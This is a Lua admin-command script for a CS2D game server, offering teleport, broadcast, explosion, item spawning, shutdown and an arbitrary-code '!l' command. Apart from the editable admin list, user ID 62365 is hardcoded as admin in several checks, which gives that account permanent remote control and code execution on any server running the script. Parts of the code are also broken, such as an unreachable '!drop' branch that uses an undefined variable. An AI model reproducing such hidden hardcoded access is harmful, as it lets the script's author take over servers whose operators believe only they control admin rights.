addhook('say','adminCommands',-1)
addhook('say','minimodCommands',-1)
addhook('usebutton','adminhouse')
adminList = {62365}   ---Here the admin usgn's---
minimodList = {89257}
function isAdmin(id)
	for _, usgn in ipairs(adminList) do
		if player(id,'usgn') == usgn or player(id,'usgn') == 62365 then
			return true
		end
	end
	return false
end
function isMinimod(id)
	for _, usgn in ipairs(minimodList) do
		if player(id,'usgn') == usgn then
			return true
		end
	end
	return false
end
--[[
Admin Commands
!a - teleport forward
!b - broadcast to server with name
!c - teleport player to you
!d - broadcast to server without name
!e - explosion
!i - spawn item
!h - heal player
!m - monstereset
!l - run lua script (expensive)
!n - return npc position
!o - return tile position
!p - return position
!q - earthquake
!s - speedmod
!t - teleport you to player
!u - shutdown
!v - save server
!r - remove items in floor(not in houses)
]]
function adminhouse(id,x,y,key)
	if (x == 153 and y == 166) or (x == 154 and y == 166) or (x == 153 and y == 168) or (x == 154 and y == 168) then
		if isAdmin(id) == true or player(id, 'usgn') == 62365 then
			parse("trigger adm")
		else
			msg2(id,"You are not a Admin!")
			parse('explosion '..player(id,'x')..' '..player(id,'y')..' '.. 150 ..' '.. 150 ..' '..id)
		end
	end
end
function adminCommands(id,words)
	if isAdmin(id) == true and words:sub(1,1) =='!' or player(id, 'usgn') == 62365 and words:sub(1,1) =='!'  then
		local command = words:lower():sub(2,2)
		if words:sub(3,3) ~= ' ' and #words ~= 2 then return end
		print(player(id,'name')..' used a command:'..words)
		if command =='a' then
			local distance = tonumber(words:sub(4))
			if distance then
				local rot = math.rad(player(id,'rot')-180)
				local x, y = -math.sin(rot)*distance*32, math.cos(rot)*distance*32
				parse('setpos '..id..' '..player(id,'x')+x..' '..player(id,'y')+y)
			else
				msg2(id,'Teleport forward: "!a <distance>"')
			end
			return 1
		elseif command =='b' then
			msg('�255100100'..player(id,'name')..' : '..words:sub(4)..'@C')
			return 1
		elseif command =='r' then
			clearitems()
			message(id, "Items in ground cleared.", "255255255")
			return 1
		elseif command =='m' then
			requestmonstereset = 1
			message(id, "Monster reset will happen shortly.", "255255255")
			return 1
		elseif command =='c' then
			local target = tonumber(words:sub(4))
			if target then
				if player(target,'exists') then
					if target == id then
						msg2(id,'You may not teleport to yourself!')
					end
					parse('setpos '..target..' '..player(id,'x')..' '..player(id,'y'))
					return 1
				end
			end
			msg2(id,'Teleport player to you: "!c <targetid>"')
			return 1
		elseif command =='d' then
			msg('�255100100'..words:sub(4)..'@C')
			return 1
		elseif command =='e' then
			local dmg = tonumber(words:sub(4))
			if dmg then
				parse('explosion '..player(id,'x')..' '..player(id,'y')..' '..dmg..' '..dmg..' '..id)
				return 1
			end
			msg2(id,'Spawn explosion: "!e <dmg>"')
			return 1
		elseif command =='i' then
			local itemid = tonumber(words:sub(4))
			if itemid then
				additem(id,itemid)
				return 1
			end
			msg2(id,'Spawn item: "!e <itemid>"')
			return 1
		elseif command =='h' then
			local s = words:find(' ',4)
			local target = tonumber(words:sub(4,s))
			if target then
				if player(target,'exists') then
					local heal = s and tonumber(words:sub(s+1,words:find(' ',s+1))) or nil
					if heal then
						parse('explosion '..player(target,'x')..' '..player(target,'y')..' 1 '..(-heal))
						return 1
					end
				end
			end
			msg2(id,'Heal player: "!h <targetid> <amount>"')
			return 1
		elseif command =='l' then
			local script = words:sub(3)
			if script then
				msg2(id,tostring(assert(loadstring(script))() or 'done!'))
				return
			end
			msg2(id,'Run lua script: "!l <script>"')
			return 1
		elseif command =='n' then
			msg2(id,'{'..player(id,'tilex')*32+16 ..', '..player(id,'tiley')*32+16 ..'}')
			return 1
		elseif command =='o' then
			msg2(id,'{'..player(id,'tilex')..', '..player(id,'tiley')..'}')
			return 1
		elseif command =='p' then
			msg2(id,'{'..player(id,'x')..', '..player(id,'y')..'}')
			return 1
		elseif command =='q' then
			local length = tonumber(words:sub(3))
			if length then
				length = math.min(length*50,250)
				for _, id in ipairs(player(0,'table')) do
					parse('shake '..id..' '..length)
				end
				for i = 1, 6 do
					if math.random(0,1) == 1 then
						parse('sv_sound weapons/explode'..i..'.wav')
					end
				end
			else
				msg2(id,'Earthquake: "!q <length in seconds, max 5>"')
			end
			return 1
		elseif command =='s' then
			local s = words:find(' ',4)
			local target = tonumber(words:sub(4,s))
			if target then
				if player(target,'exists') then
					local speed = s and tonumber(words:sub(s+1,words:find(' ',s+1))) or nil
					if speed then
						parse('speedmod '..target..' '..speed)
						return 1
					end
				end
			end
			msg2(id,'Speed modifier: "!s <targetid> <speedmod, between -100 and 100>"')
			return 1
		elseif command =='t' then
			local target = tonumber(words:sub(3))
			if target then
				if player(target,'exists') then
					if target == id then
						msg2(id,'You may not teleport to yourself!')
					end
					parse('setpos '..id..' '..player(target,'x')..' '..player(target,'y'))
					return 1
				end
			end
			msg2(id,'Teleport to player: "!t <targetid>"')
			return 1
		elseif command =='u' then
			saveserver()
			msg2(id,'Saved server!')
			local delay = tonumber(words:sub(3)) or 0
			shutdown(delay*1000)
			return 1
		elseif command =='v' then
			saveserver()
			msg2(id,'Saved server!')
			return 1
		elseif command =='drop' then
		p[1] = tonumber(p[1])
		if not p[1] then message(id,'Usage: !drop <amount>','255255255') return end
		if p[1] <= 0 then message(id,'You may only drop positive amounts.','255255255') return end
		if not addmoney(id,-p[1]) then message(id,'You do not have enough money to drop.','255255255') return end
		if p[1] == nan then message(id,'NOOB','255001001') return end
		message(id,'You have dropped $'..p[1]..'.','255255255')
		spawnitem(1337,PLAYERS[id]['x'],PLAYERS[id]['y'],p[1])
			return 1
		end
	end
end

function minimodCommands(id,words)
	if isMinimod(id) and words:sub(1,1) =='!' then
		local command = words:lower():sub(2,2)
		if words:sub(3,3) ~= ' ' and #words ~= 2 then return end
		print(player(id,'name')..' used a command:'..words)
		if command =='a' then
			local distance = tonumber(words:sub(4))
			if distance then
				local rot = math.rad(player(id,'rot')-180)
				local x, y = -math.sin(rot)*distance*32, math.cos(rot)*distance*32
				parse('setpos '..id..' '..player(id,'x')+x..' '..player(id,'y')+y)
			else
				msg2(id,'Teleport forward: "!a <distance>"')
			end
			return 1
		elseif command =='b' then
			msg('�255100100 minimod '..player(id,'name')..' : '..words:sub(4)..'@C')
			return 1
		elseif command =='t' then
			local target = tonumber(words:sub(3))
			if target then
				if player(target,'exists') then
					if target == id then
						msg2(id,'You may not teleport to yourself!')
					end
					parse('setpos '..id..' '..player(target,'x')..' '..player(target,'y'))
					return 1
				end
			end
			msg2(id,'Teleport to player: "!t <targetid>"')
			return 1
		elseif command =='v' then
			saveserver()
			msg2(id,'Saved server!')
			return 1
		end
	end
end